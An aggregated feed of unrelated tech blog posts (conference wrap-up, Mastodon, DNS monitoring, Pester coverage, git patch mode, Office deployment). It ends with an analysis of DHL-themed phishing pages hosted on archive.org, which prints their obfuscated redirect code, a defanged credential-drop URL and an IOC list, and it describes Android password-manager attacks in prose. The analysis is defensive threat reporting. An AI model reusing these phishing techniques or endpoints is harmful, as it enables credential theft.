My next choice was to follow "Extracting All Your Secrets: Vulnerabilities in Android Password Managers" presented by Stephan Huber, Steven Arzt and Siegfried Rasthofer. Passwords remain a threat for most people. For years, we have asked users to use strong passwords and to change them regularly. The goal here was not to debate how passwords must be managed but, since we recommend that users rely on password managers to handle their huge amount of passwords, to ask: are those managers really safe? An interesting study demonstrated that, on average, users have to deal with 90 passwords. The research focused on Android applications. First of all, most of them claim "banking level" or "military grade" encryption. True or false? Well, encryption is not the only protection for passwords: is it possible to steal them using alternative attack scenarios? Guess what? They chose the top password managers by number of downloads on the Google Play store. They all provide standard features like autofill, a custom browser, comfort features, secure sync and, of course, confidential password storage. (Important note: all the attacks were performed on non-rooted devices.)

The first attack scenario was the manual filling attack: manual filling uses the clipboard. First problem: any application can read from the clipboard without any specific rights, so a clipboard sniffer app can steal any password. The second scenario was the automatic filling attack. How does it work? Applications cannot communicate directly due to the sandboxing system; they have to use the "Accessibility service" (normally meant for disabled people). An issue may arise if the application doesn't check the complete app name. Example: create an app whose package name also starts with "com.twitter", like "com.twitter.twitterleak". The next attack is based on the backup function: make a backup, convert it to .tar, untar it and get the master password in plain text in KeyStorage.xml. Browsers don't provide APIs to perform autofill, so developers create a custom browser, running in the same sandbox. Cool! But can we abuse this? These browsers are based on the WebView API, which supports access to files… file:///data/package/…./passwords_pref.xml. Where is the key? In the source code, split in two 🙂 More fails reported by the speakers:

  • Custom crypto (“because AES isn’t good enough?”)
  • AES used in ECB mode for db encryption
  • Shipped browsers that do not consider subdomains in form fields
  • Data leakage in browsers
  • Custom transport security

How to improve the security of password managers:

  • Android provides a keystore, use it!
  • Use key derivation function
  • Avoid hardcoded keys
  • Do not abuse the account manager

The complete research is available here. [Slides are available here]

After the lunch, Antonios Atlasis presented "An Attack-in-Depth Analysis of Multicast DNS and DNS Service Discovery". The objective was to perform a threat analysis and to release a tool to run tests on a local network. The starting point was the RFCs and identifying the potential risks. mDNS & DNS-SD are used for zero-conf networking, for example by the AppleTV, the Google Chromecast, home speakers, etc. mDNS (RFC 6762) provides DNS-like operations, but on the local network (using UDP port 5353). DNS-SD (RFC 6763) allows clients to discover instances of a specific service (using standard DNS queries). mDNS uses the ".local" TLD via 224.0.0.251 & FF02::FB. Antonios made a great review of the problems associated with these protocols. The possible attacks are:

  • Reconnaissance (when you search for a printer, all the services will be returned; this is useful to gather information about your victim, and easy to get without scanning; see the query example after this list). I liked this one.
  • Spoofing
  • DoS
  • Remote unicast interaction
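
For the reconnaissance scenario above, this is what such a service enumeration can look like with plain dig (a hedged example of standard mDNS/DNS-SD browsing, runnable from any host on the LAN):

# enumerate advertised DNS-SD services on the local network via mDNS
dig @224.0.0.251 -p 5353 -t PTR _services._dns-sd._udp.local +short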

An mDNS implementation can also be abused to perform a DoS attack from a remote location. While most modern OSes are protected, some embedded systems still use vulnerable Linux implementations. Interesting: close to 1M devices are listening on port 5353 on the Internet (Shodan). Not all of them are vulnerable, but chances are many are. During the demos, Antonios used the tool he developed: pholus.py. [Slides are available here]

Then, Patrick Wardle presented "OverSight: Exposing Spies on macOS". Patrick gave a quick talk yesterday in the CommSec track; it was very nice, so I expected more good content. Today the topic was the malware on OSX that abuses the microphone and webcam; to protect against it, he developed a tool called OverSight. Why do bad guys use webcams? To blackmail victims. Why do governments use microphones? To spy. From a developer point of view, how do you access the webcam? Via the AVFoundation framework. Sandboxed applications must have specific rights to access the camera (via the entitlement 'com.apple.security.device.camera'), but non-sandboxed applications do not require this entitlement to access the cam. videoSnap is a nice example of AVFoundation use; the companion tool for the microphone is audioSnap. The best way to protect your webcam is to put a sticker on it. Note that it is also possible to restrict access to it via file permissions.

What about malware that uses the mic/cam? (Note: the LED will always be on.) Patrick reviewed some of them, as he did yesterday:

  • The Hackingteam’s implant
  • Eleanor
  • Mokes
  • FruitFly

To protect against abusive access to the webcam & microphone, Patrick developed the aforementioned OverSight. Version 1.1 was just released with new features (better support for the mic, whitelisting apps which can access resources). The talk ended with a nice case study: Shazam was reported as listening to the mic all the time (even when disabled). This was reported to Patrick by an OverSight user, and he decided to have a deeper look. He discovered that it's not a bug but a feature, and contacted Shazam: for performance reasons they use continuous recording on iOS, and a shared SDK is used with OSX. Malicious or not? "OFF" in fact means "stop processing the recording", not "stop the recording".

Other tools developed by Patrick:

  • KnockKnock
  • BlockBlock
  • RansomWhere (detects encryption of files and a high number of created files)

It was a very cool talk with lots of interesting information and tips to protect your OSX computers! [Slides are available here]

The last talk on my list was "Is There a Doctor in The House? Hacking Medical Devices and Healthcare Infrastructure" presented by Anirudh Duggal. Usually, such talks present vulnerabilities in the devices that we can find everywhere in hospitals, but this talk focused on something completely different: the HL7 2.x protocol. Hospitals have devices (monitors, X-ray, MRI, …), networks, protocols (DICOM, HL7, FHIR, HTTP, FTP) and records (patients). HL7 is a messaging standard used by medical devices to achieve interoperability. Messages may contain patient info (PII), doctor info, patient visit details, allergies & diagnostics. Anirudh reviewed the different types of messages that can be exchanged, like "RDE" or "Pharmacy Order Message". The common attacks are:

  • MITM (everything is in clear text)
  • Message source not validated
  • DoS
  • Fuzzing

It is scary to see that such important information is exchanged with so little protection. How to improve? According to Anirudh, here are some ideas:

  • Validate messages size
  • Enforce TLS
  • Input sanitization
  • Fault tolerance
  • Anonymization
  • Add consistency checks (checksum)

The future? HL7 will be replaced by FHIR, a lightweight HTTP-based API. I learned interesting stuff about this protocol… [Slides are available here]

The closing keynote was given by Natalie Silvanovich, who works on Google Project Zero. It was about the Chakra JavaScript engine. Natalie reviewed the code and discovered 13 bugs, now fixed. She started the talk with a deep review of how arrays work in the JavaScript engine. Arrays are very important in JS. They are simple but can quickly become complicated with arrays of arrays of arrays. Example:

var b = [ 1, "bob", {}, new RegExp() ];

The second part of the talk was dedicated to a review of the bugs she found during her research. I was a bit lost (the end of the day, and not my preferred topic), but the work performed looked very nice.

The 2017 edition is now over. Besides the talks, the main room was full of sponsor booths with nice challenges, hackerspaces, etc. A great edition! See you next year, I hope!

Hackerspaces

ICS Lab

 

[The post HITB Amsterdam 2017 Day #2 Wrap-Up has been first published on /dev/random]

Frank Goossens: Music from the soul; Kamasi Washington – Truth

Lionel Dricot: Mastodon, the first truly social social network?


You may have heard of Mastodon, the new social network competing with Twitter. Its advantages? A per-post limit raised from 140 to 500 characters, and a community-oriented, respectful approach, where Twitter has too often been the playground of cyber-harassment.

But one of Mastodon's major particularities is decentralisation: it is not a single service owned by one company, but a network, like email.

While anyone can in theory create their own Mastodon instance, most of us will join existing ones. I personally joined mamot.fr, the instance run by La Quadrature du Net, because I trust the association's longevity and technical competence and, above all, because I am aligned with its values of neutrality and freedom of expression. I also recommend framapiaf.org, which is administered by Framasoft.

But you will find plenty of instances: from those of the French and Belgian Pirate parties to themed instances. There are even paid instances and, why not, there could one day be ad-supported ones.

The beauty of all this lies, of course, in the choice. The instances of La Quadrature du Net and Framasoft are open and free, so I suggest setting up a small recurring donation of €2, €5 or €10 per month to the association, depending on your means.

Is Mastodon decentralised? We should really say "distributed". Five years ago, I called out the problems of decentralised/distributed solutions, the main one being that you depend on the goodwill, or the blunders, of your instance's administrator.

It has to be said that Mastodon has technically solved none of these problems. But it seems to be creating a beautiful community dynamic that is a pleasure to watch. Unlike its ancestor Identi.ca, instances have multiplied quickly. Conversations have taken off and usages have emerged spontaneously: welcoming newcomers, following people who have few followers to encourage them, transparently discussing which good practices to adopt, using CWs (Content Warnings) to hide potentially inappropriate messages, debating moderation rules.

All this energy gives the impression of a space apart, of a freedom of discussion far from the omnipresent and omniscient advertising surveillance that is inseparable from the Facebook, Twitter or Google tools.

Incidentally, one user proposed that on Mastodon we speak not of "users" but of "people".

In a previous article, I noted that social networks are the beginnings of a global consciousness of humanity. But as Neil Jomunsi points out, the medium is an inseparable part of the message. Do we really want humanity to be represented by an advertising platform that seeks to exploit its users' brain time?

Mastodon is thus, in my view, the expression of a real need, of something missing. A part of our humanity is smothered by advertising, consumption and conformism, and is looking for a space in which to express itself.

Could Mastodon then be the first popular distributed social network? Will it manage to win over less technical users and stand out enough not to be "yet another free clone" (as Diaspora unfortunately is for Facebook)?

Will Mastodon last? As long as there are volunteers to run instances, Mastodon will keep existing, without worrying about stock prices, governments, the laws of any particular country or the wishes of investors. The same cannot be said of Facebook or Twitter.

But above all, a wind of fresh utopia blows through Mastodon, an air of naive freedom, a feeling of collaborative humanity where the quality of exchanges outweighs the race for audience. It feels good.

Feel free to join us, read Funambuline's user guide and post your first "toot" introducing your interests. If you say you come from me ( @ploum@mamot.fr ), I will "boost" you (the equivalent of a retweet) and the community will suggest people for you to follow.

In the end, it doesn't really matter whether Mastodon succeeds or disappears in a few months. We must keep trying, testing and experimenting until it works. If it is not Diaspora or Mastodon, it will be the next one. Our global consciousness, our expression and our exchanges deserve better than being mere filler between two ads on a platform subject to laws over which we have no hold.

Mastodon is a social network. Twitter and Facebook are advertising networks. Let's not get it wrong any longer.

 

Photo by Daniel Mennerich.

This text was published thanks to your regular support on Tipeee and on Paypal. I am @ploum: blogger, writer, speaker and futurologist. You can follow me on Facebook, Medium or contact me.

This text is published under the CC-By BE licence.

Mattias Geniar: DNS Spy has launched!



I set out to create a DNS monitoring & validation solution called DNS Spy and I'm happy to report: it has launched!

It's been in private beta since 2016 and in public beta since March 2017. After almost 6 months of feedback, features and bugfixes, I think it's ready for everyone to kick the tires.

What's DNS Spy?

In case you haven't been following me the last few months, here's a quick rundown of DNS Spy.

  • Monitors your domains for any DNS changes
  • Alerts you whenever a record has changed
  • Keeps a detailed history of each DNS record change
  • Notifies you of invalid or RFC-violating DNS configs
  • Rates your DNS configurations with a scoring system
  • Is free for 1 monitored domain
  • Provides a point-in-time back-up of all your DNS records
  • It can verify if all your nameservers are in sync
  • Supports DNS zone transfer (AXFR)
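
For reference, a zone transfer is what you would otherwise do manually with dig (the nameserver below is a placeholder):

# manual equivalent of the AXFR support (hypothetical nameserver)
dig AXFR example.com @ns1.example.com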

There are many more features, like CNAME resolving, public domain scanning, offline & change notifications, ... that all make DNS Spy what it is: a reliable & stable DNS monitoring solution.

A new look & logo

The beta design of DNS Spy was built using a Font Awesome icon and some copy/paste Bootstrap templates, just to validate the idea. I've gotten enough feedback to feel confident that DNS Spy adds actual value, so it was time to make the look & feel match that sentiment.

This was the first design:

Here's the new & improved look.

It's got a brand new look, a custom logo and a way to publicly scan & rate your domain configuration.

Public scoring system

You've probably heard of tools like SSL Labs' test & Security Headers, free web services that allow you to rate and check your server configurations, each with a focus on its own domain.

From now on, DNS Spy also has such a feature.

Above is the DNS Spy scan report for StackOverflow.com, which has a rock solid DNS setup.

We rate things like connectivity (IPv4 & IPv6, records synced, ...), performance, resilience & security (how many providers, domains, DNSSEC & CAA support, ...) & DNS records (how is SPF/DMARC set up, are your TTLs long enough, do your NS records match your nameservers, ...).
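
If you want to spot-check some of these by hand, the usual dig incantations look like this (example.com is a placeholder):

dig +short TXT example.com          # SPF lives in a TXT record
dig +short TXT _dmarc.example.com   # DMARC policy
dig +short CAA example.com          # CAA records
dig +short NS example.com           # compare with your actual nameservers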

The aim is for DNS Spy to become the SSL Labs of DNS configurations. To make that a continuous improvement, I encourage any feedback from you!

If you're curious how your domain scores, scan it via dnsspy.io.

Help me promote it?

Next up, of course, is promotion. There are a lot of ways to promote a service, and advertising is surely going to be one of them.

But if you've used DNS Spy and like it or if you've scanned your domain and are proud of your results, feel free to spread word of DNS Spy to your friends, coworkers, online followers, ... You'd have my eternal gratitude! :-)

DNS Spy is available on dnsspy.io or via @dnsspy on Twitter.

The post DNS Spy has launched! appeared first on ma.ttias.be.

Xavier Mertens: [SANS ISC] Hunting for Malicious Excel Sheets


I published the following diary on isc.sans.org: “Hunting for Malicious Excel Sheets“.

Recently, I found a malicious Excel sheet which contained a VBA macro. One particularity of this file was that useful information was stored in cells. The VBA macro read and used them to download the malicious PE file. The Excel file looked classic, asking the user to enable macros… [Read more]

[The post [SANS ISC] Hunting for Malicious Excel Sheets has been first published on /dev/random]


Jan De Dobbeleer: Cover all the things


This is one which has been on my list for a while. Coming from writing C# and being used to existing tooling and integrations with popular platforms to display information about your code, I kind of miss that when writing PowerShell. One of those is code coverage uploading and displaying on Coveralls.io. Not just because it's cool, but because it allows you to add that information to your repository and forces you to either keep the current number or improve it. But, as it seems I once said something about not bitching and getting shit done, let's fix that, shall we?

"You should get your work done instead of bitching about it" - another great quote from @Jan_Joris
I can only subscribe and say amem

— Jønatas C D (@JonatasCD) March 8, 2017

PowerShell has an awesome testing tool called Pester; if you've never used it, make sure to check it out. Pester has the ability to check for code coverage out of the box. It will list all lines within the specified files which have been hit, how many times they've been hit and which ones never got hit. Using this information, we can format the result and send it to Coveralls for display. As I know everyone loves a bit of simplicity, I created a module called Coveralls that allows you to take advantage of this logic and use it wherever you'd like. In my case, I added it to the testing logic for modules on AppVeyor, so that the coverage is updated every time the code is tested on master. To do this you need to add a few lines to your appveyor.yml file.

First off, we need a key to push the results to Coveralls. Make sure to create a secure variable using the Coveralls API token for your repository.

environment:
    CA_KEY:
      secure: yyBVxcqc8JCSyOJf5I8ufwmwjkgMxouJ1ZyuCkAXdffDDU2VfZCZHK9lkHeph3SM

Secondly, we need to resolve a few dependencies.

before_test:
  - ps: Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
  - ps: Install-Module Coveralls -MinimumVersion 1.0.5 -Scope CurrentUser
  - ps: Import-Module Coveralls

It could be that you also need the NuGet provider; if you see an error indicating this, just prepend - ps: Get-PackageProvider -Name Nuget -Force to the before_test section.

Lastly, we need to format and publish the results.

test_script:
  - ps: $coverageResult = Format-Coverage -Include @('Helpers\PoshGit.ps1','Helpers\Prompt.ps1','install.ps1') -CoverallsApiToken $ENV:CA_KEY -BranchName $ENV:APPVEYOR_REPO_BRANCH
  - ps: Publish-Coverage -Coverage $coverageResult

There’s just one caveat here. As Keith Dahlby found out when we added this to posh-git, secure variables do not work on pull requests. This is done to avoid anyone decrypting and displaying that value and run away with your online identity, maybe ending up dating your wife and feeding your kids (the bastards!). As we don’t want that, make sure you either check you have a value in $ENV:CA_KEY and replace it with dummy info if not or don’t build on PR’s.

This example is coming from my oh-my-posh repository, where you can already see a neat Coveralls badge displaying the, somewhat disappointing, code coverage percentage. You can find more info about the module when you visit the project on GitHub. And yes, I do see the irony in having a module about code coverage with 0 tests and no lovely badge. It’s on my list, ok? Don’t be a dick about it.

Source code

Jan De Dobbeleer: Patch me up sir!


We’ve all been there, working on code and forgetting about source control for a few hours. In my case, this resulted in crappy, way too large commits once I was happy with the result. In the best possible outcome, I could split the changes into multiple commits when the changes span across different files, but most of the time that’s not really the case.

It wasn’t until a while back that I figured out git has a way of dealing with that. All this time I thought I simply sucked at source control and would never be able to master that craft on top of all the other skills. No. In fact, it’s completely normal to forget about source control during programming and git can help you sort stuff once you’re done being awesome. But how? Meet patch mode. In this example, we’ll have a look at git add -p, but know that patch mode exists on a multitude of commands, not just add. I’ll come back to that later, but let’s start by looking add -p first.

As I said, we start off by having a lot of files and changes that, if we want to do the right thing, should be split into different commits. The problem isn't that we have multiple files; the problem is that each file contains a mix of changes, only some of which belong together in one commit. So we need a way to split those changes: stage some, and keep the rest as modified for a later commit.

When we type git add -p, git will present us with something that looks familiar and other stuff that looks rather unfamiliar if you’ve never been here before.

PS> git add -p

diff --git a/_posts/2017-03-16-cover-all-the-things.md b/_posts/2017-03-16-cover-all-the-things.md
index 4b3185c..646c9e0 100644
--- a/_posts/2017-03-16-cover-all-the-things.md
+++ b/_posts/2017-03-16-cover-all-the-things.md
@@ -35,6 +35,9 @@ Lastly, we need to format and publish the results.

 ...

+Look, I'm new here
+I'm new here too
+
 ...
\ No newline at end of file
Stage this hunk [y,n,q,a,d,/,s,e,?]?

The first part of this output looks like a diff, but we do see something else at the end: git talks about a hunk. If you change more than one part of a file, and provided the changes are more than a few lines apart, git will already split your file into multiple hunks. At the bottom, you can see git presents us with a few options. I'll only cover the ones I use the most, as those will also be the ones you'll be using the most. There's no need to complicate things 😊. You can type ? to get a bit more information about every option.

y - stage this hunk
n - do not stage this hunk
q - quit; do not stage this hunk or any of the remaining ones
a - stage this hunk and all later hunks in the file
d - do not stage this hunk or any of the later hunks in the file
s - split the current hunk into smaller hunks
e - manually edit the current hunk
? - print help

y and n are rather straightforward, we either choose to stage this hunk or not. q will get you back to your safe zone if you came here by accident. a can be used to stage this hunk and all the remaining hunks in the same file. d is the opposite: it won't stage this hunk or any remaining ones for that file. Quite boring, you say? Yup, but we've reached the interesting part. Suppose the hunk you see before you contains changes you want to stage, but also a few lines you'd rather not stage right now. You could try to let git split the hunk for you using s, but that won't always work. When the lines are too close together, git will just repeat the same hunk over and over when trying to split it. In that case you want to use e and manually edit the diff. And that's an important concept: you will edit the diff, not the file itself.

Try pressing e and your editor will pop up containing the diff for the selected hunk. There’s also a nice little companion text to guide you through this feature.

# Manual hunk edit mode -- see bottom for a quick guide.
@@ -35,6 +35,9 @@ Lastly, we need to format and publish the results.
 
 ...
 
+Look, I'm new here
+I'm new here too
+
...
\ No newline at end of file
# ---
# To remove '-' lines, make them ' ' lines (context).
# To remove '+' lines, delete them.
# Lines starting with # will be removed.
# 
# If the patch applies cleanly, the edited hunk will immediately be
# marked for staging.
# If it does not apply cleanly, you will be given an opportunity to
# edit again.  If all lines of the hunk are removed, then the edit is
# aborted and the hunk is left unchanged.

In the example above, two lines were added to the file. The guide describes two options depending on what you want to do. In case it's a removal (lines starting with -), you have to replace the - with a space. That might seem straightforward but I've seen many people (including me at first) mess this up: leave the line as is and just replace the - with a blank space. That's all. In case of an addition (lines starting with +), you simply need to delete the entire line to not stage that change. Remember, we are not editing the file itself, only the diff; on our filesystem, the file will still contain all the changes. We simply tell git which changes to stage and prepare for a commit. So if you wish to only keep the first added line, you'll end up with this after the edit:

...
 
+Look, I'm new here
...

In case you mess up, git will not apply the patch and tell you. You can either quit or modify the diff again to fix that.

Now, I said in the beginning that add is not the only command where you can use this mode. You can make use of it on commit, checkout, reset and stash as well. As it's a powerful feature that also iterates through every change you made, I use it all the time to review my changes and create nice, clean, contextual commits. It's almost second nature to simply use git commit -p -m 'Some new code' instead of adding every file separately or worrying about my changes along the way. I can keep on coding and when I'm happy with the result I'll make sure to create an impeccable git log.
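For completeness, here's what patch mode looks like on those other commands (the file name is just an example):

PS> git commit -p -m 'Some new code'   # pick hunks and commit them in one go
PS> git checkout -p -- install.ps1     # interactively discard hunks from the working tree
PS> git reset -p                       # interactively unstage hunks you already added
PS> git stash -p                       # stash only the hunks you select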

Are there any GUIs out there that support this, you ask? Sure, GitHub for Desktop allows you to stage individual lines, which is exactly what git add -p allows you to do. The ever so awesome GitKraken displays hunks when you click on modified files, and there you can also stage line by line. When it comes to git and GUI tools, I usually can't recommend anything useful that won't create even more confusion. That is, until GitKraken came along. You still need to know what it's all about, and no GUI can help you with that, but given that it uses the correct naming for its actions, that's the one I recommend if you're looking for a GUI tool to manage your git repos.

Now go out and have fun creating clean commits!

Claudio Ramirez: MS Office 365 (Click-to-Run): Remove unused applications


Too many MS Office 365 apps

Update 20160421:
– update for MS Office 2016.
– fix configuration.xml view on WordPress.

If you install Microsoft Office through Click-to-Run you'll end up with the full suite installed. You can no longer select which applications you want to install. That's kind of OK because you pay for the complete suite. Or at least the organisation (school, work, etc.) offering the subscription does. But maybe you are like me and you dislike installing applications you don't use. Or even more like me: you're a Linux user with a Windows VM you boot once in a while out of necessity. And unused applications in a VM residing on your disk are *really* annoying.

The Microsoft documentation for removing the unused applications (Access as a DB? Yeah, right…) wasn't very straightforward, so I post what worked for me after the needed trial-and-error routines. This is a small howto:

    • Install the Office Deployment Toolkit (download for MS Office 2013 or 2016). The installer asks for an installation location. I put it in C:\Users\nxadm\OfficeDeployTool (change the username accordingly). If you're short on space (or in a VM), you can put it in a mounted share.
    • Create a configuration.xml describing the installation and the applications you want to exclude. The file should reside in the directory you chose for the Office Deployment Toolkit (e.g. C:\Users\nxadm\OfficeDeployTool\configuration.xml) or you should refer to the file with its full path name. You can find the full list of AppIDs here (with more info about other settings). Add or remove ExcludeApp entries as desired. My configuration file is as follows (WordPress strips the XML below, hence the image; see the reconstructed sketch after this list):
      configuration.xml
    • If you run the 64-bit Office version change OfficeClientEdition="32" to OfficeClientEdition="64".
    • Download the Office components. Type in a cmd box:
      C:\Users\nxadm\OfficeDeployTool>setup.exe /download configuration.xml
    • Remove the unwanted applications:
      C:\Users\nxadm\OfficeDeployTool>setup.exe /configure configuration.xml
    • Delete (if you want) the Office Deployment Toolkit directory. Especially the cached installation files in the “Office” directory take a lot of space.

    Enjoy the space and faster updates. If you are using a VM don’t forget to defragment and compact the Virtual Hard Disk to reclaim the space.
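    Since only a screenshot of the XML survived here, a reconstructed sketch of what such a configuration.xml can look like (the Product ID and the excluded applications are illustrative; adjust them to your subscription and needs):

      <Configuration>
        <Add OfficeClientEdition="32">
          <Product ID="O365ProPlusRetail">
            <Language ID="en-us" />
            <!-- one ExcludeApp entry per application you do not want -->
            <ExcludeApp ID="Access" />
            <ExcludeApp ID="Publisher" />
            <ExcludeApp ID="OneNote" />
          </Product>
        </Add>
      </Configuration>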



    Xavier Mertens: [SANS ISC] DNS Query Length… Because Size Does Matter


    I published the following diary on isc.sans.org: “DNS Query Length… Because Size Does Matter“.

    In many cases, DNS remains a goldmine to detect potentially malicious activity. DNS can be used in multiple ways to bypass security controls. DNS tunnelling is a common way to establish connections with remote systems. It is often based on “TXT” records used to deliver the encoded payload. “TXT” records are also used for good reasons, like delivering SPF records but, too many TXT DNS requests could mean that something weird is happening on your network… [Read more]

    [The post [SANS ISC] DNS Query Length… Because Size Does Matter has been first published on /dev/random]

    Xavier Mertens: Archive.org Abused to Deliver Phishing Pages


    The Internet Archive is a well-known website, most notably for its “WaybackMachine” service, which allows you to search for and display old versions of websites. Its current Alexa ranking is 262, which makes it a “popular and trusted” website. Indeed, as I explained in a recent SANS ISC diary, whitelists of websites are very important for attackers! The phishing attempt that I detected was also using the URL shortener bit.ly (position 9380 in the Alexa list).

    The phishing is based on a DHL notification email. The mail has a PDF attached to it:

    DHL Notification

    This PDF has no malicious content and is therefore not blocked by antispam/antivirus. The link “Click here” points to a bit.ly short URL:

    hxxps://bitly.com/2jXl8GJ

    Note that HTTPS is used, which already makes the traffic uninspected by many security solutions.


    Tip: If you append a “+” at the end of the URL (e.g. hxxps://bitly.com/2jXl8GJ+), bit.ly will not directly redirect you to the hidden URL but will display an information page where you can read this URL!


    The URL behind the short URL is:

    hxxps://archive.org/download/gxzdhsh/gxzdhsh.html

    Bit.ly also maintains statistics about the visitors:

    bit.ly Statistics

    It’s impressive to see how many people visited the malicious link. The phishing campaign was also active since the end of March. Thank you bit.ly for this useful information!

    This URL returns the following HTML code:

    <html>
    <head>
    <title></title>
    <META http-equiv="refresh" content="0;URL=data:text/html;base64, ... (base64 data) ... "></head>
    <body bgcolor="#fffff">
    <center>
    </center>
    </body>
    </html>

    The base64 payload of the refresh META tag decodes to the following HTML code:

    <script language="Javascript">
    document.write(unescape('%0A%3C%68%74%6D%6C%20%68%6F%6C%61%5F%65%78%74%5F%69%6E%6A%65%63
    %74%3D%22%69%6E%69%74%65%64%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D
    %65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D
    %22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31
    %32%35%32%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F
    %6E%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%68%6C%2E%63%6F%6D%2F%69
    %6D%67%2F%66%61%76%69%63%6F%6E%2E%67%69%6
    ...
    %3E%0A%09%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%65%64%61%67
    %72%6F%6C%74%64%2E%63%6F%6D%2F%6D%6F%62%2F%44%48%4C%5F%66%69%6C%65%73%2F%61%6C%69%62%61
    %62%61%2E%70%6E%67%22%20%68%65%69%67%68%74%3D%22%32%37%22%20%0A%0A%77%69%64%74%68%3D%22
    %31%33%30%22%3E%0A%09%3C%2F%74%64%3E%0A%0A%09%3C%2F%74%72%3E%3C%2F%74%62%6F%64%79%3E%3C
    %2F%74%61%62%6C%65%3E%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%0A%0A%0A%3C%74%72%3E%3C%74%64
    %20%68%65%69%67%68%74%3D%22%35%25%22%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30
    %22%3E%0A%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C
    %65%3E%0A%0A%0A%0A%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
    </Script>
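    Both obfuscation layers are trivial to peel off offline. A minimal PowerShell sketch ($b64 and $escaped are placeholders for the base64 payload and the unescape() argument found in the page source):

    $html  = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b64))  # META refresh layer
    $clear = [Uri]::UnescapeDataString($escaped)                                 # JavaScript unescape() layer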

    The deobfuscated script displays the following page:

    DHL Phishing Page

    The pictures are stored on a remote website but it has already been cleaned:

    hxxp://www.fedagroltd.com/mob/DHL_files/

    Stolen data is sent to another website (this one is still alive):

    hxxp://www.magnacartapeace.org.ng/wp/stevedhl/kenbeet.php

    The question is: how was this phishing page stored on archive.org? If you visit the upper level of the malicious URL (https://archive.org/download/gxzdhsh/), you find this:

    archive.org Files

    Go up one more directory (‘../’) and you will find the owner of this page: alextray. This guy has many phishing pages available:

    alextray's Projects

    Indeed, the Internet Archive website allows registered users to upload content, as stated in the FAQ. If you search for ‘archive.org/download’ on Google, you will find a lot of references to multiple contents (most of them harmless), but on VirusTotal (VT) there are references to malicious content hosted on archive.org.

    Here is the list of phishing sites hosted by “alextray”. You can use them as IOCs:

    hxxps://archive.org/download/gjvkrduef/gjvkrduef.html
    hxxps://archive.org/download/Jfojasfkjafkj/jfojas;fkj;afkj;.html
    hxxps://archive.org/download/ygluiigii/ygluiigii.html (Yahoo!)
    hxxps://archive.org/download/ugjufhugyj/ugjufhugyj.html (Microsoft)
    hxxps://archive.org/download/khgjfhfdh/khgjfhfdh.html (DHL)
    hxxps://archive.org/download/iojopkok/iojopkok.html (Adobe)
    hxxps://archive.org/download/Lkmpk/lkm[pk[.html (Microsoft)
    hxxps://archive.org/download/vhjjjkgkgk/vhjjjkgkgk.html (TNT)
    hxxps://archive.org/download/ukryjfdjhy/ukryjfdjhy.html (TNT)
    hxxps://archive.org/download/ojodvs/ojodvs.html (Adobe)
    hxxps://archive.org/download/sfsgwg/sfsgwg.html (DHL)
    hxxps://archive.org/download/ngmdlxzf/ngmdlxzf.html (Microsoft)
    hxxps://archive.org/download/zvcmxlvm/zvcmxlvm.html (Microsoft)
    hxxps://archive.org/download/ugiutiyiio/ugiutiyiio.html (Yahoo!)
    hxxps://archive.org/download/ufytuyu/ufytuyu.html (Microsoft Excel)
    hxxps://archive.org/download/xgfdhfdh/xgfdhfdh.html (Adobe)
    hxxps://archive.org/download/itiiyiyo/itiiyiyo.html (DHL)
    hxxps://archive.org/download/hgvhghg/hgvhghg.html (Google Drive)
    hxxps://archive.org/download/sagsdg_201701/sagsdg.html (Microsoft)
    hxxps://archive.org/download/bljlol/bljlol.html (Microsoft)
    hxxps://archive.org/download/gxzdhsh/gxzdhsh.html (DHL)
    hxxps://archive.org/download/bygih_201701/bygih.html (DHL)
    hxxps://archive.org/download/bygih/bygih.html (DHL)
    hxxps://archive.org/download/ygi9j9u9/ygi9j9u9.html (Yahoo!)
    hxxps://archive.org/download/78yt88/78yt88.html (Microsoft)
    hxxps://archive.org/download/vfhyfu/vfhyfu.html (Yahoo!)
    hxxps://archive.org/download/yfuyj/yfuyj.html (DHL)
    hxxps://archive.org/download/afegwe/afegwe.html (Microsoft)
    hxxps://archive.org/download/nalxJL/nalxJL.html (DHL)
    hxxps://archive.org/download/jfleg/jfleg.html (DHL)
    hxxps://archive.org/download/yfigio/yfigio.html (Microsoft)
    hxxps://archive.org/download/gjbyk/gjbyk.html (Microsoft)
    hxxps://archive.org/download/nfdnkh/nfdnkh.html (Yahoo!)
    hxxps://archive.org/download/GfhdtYry/gfhdt%20yry.html (Microsoft)
    hxxps://archive.org/download/fhdfxhdh/fhdfxhdh.html (Microsoft)
    hxxps://archive.org/download/iohbo6vu5/iohbo6vu5.html (DHL)
    hxxps://archive.org/download/sgsdgh/sgsdgh.html (Adobe)
    hxxps://archive.org/download/mailiantrewl/mailiantrewl.html (Google)
    hxxps://archive.org/download/ihiyi/ihiyi.html (Microsoft)
    hxxps://archive.org/download/glkgjhtrku/glkgjhtrku.html (Microsoft)
    hxxps://archive.org/download/pn8n8t7r/pn8n8t7r.html (Microsoft)
    hxxps://archive.org/download/aEQWGG/aEQWGG.html (Yahoo!)
    hxxps://archive.org/download/isajcow/isajcow.html (Yahoo!)
    hxxps://archive.org/download/pontiffdata_yahoo_Kfdk/;kfd;k.html (Yahoo!)
    hxxps://archive.org/download/vuivi/vuivi.html (TNT)
    hxxps://archive.org/download/lmmkn/lmmkn.html (Microsoft)
    hxxps://archive.org/download/ksafaF/ksafaF.html (Google)
    hxxps://archive.org/download/fsdgs/fsdgs.html (Microsoft)
    hxxps://archive.org/download/joomlm/joomlm.html (Microsoft)
    hxxps://archive.org/download/rdgdh/rdgdh.html (Adobe)
    hxxps://archive.org/download/pontiffdata_yahoo_Bsga/bsga.html (Microsoft)
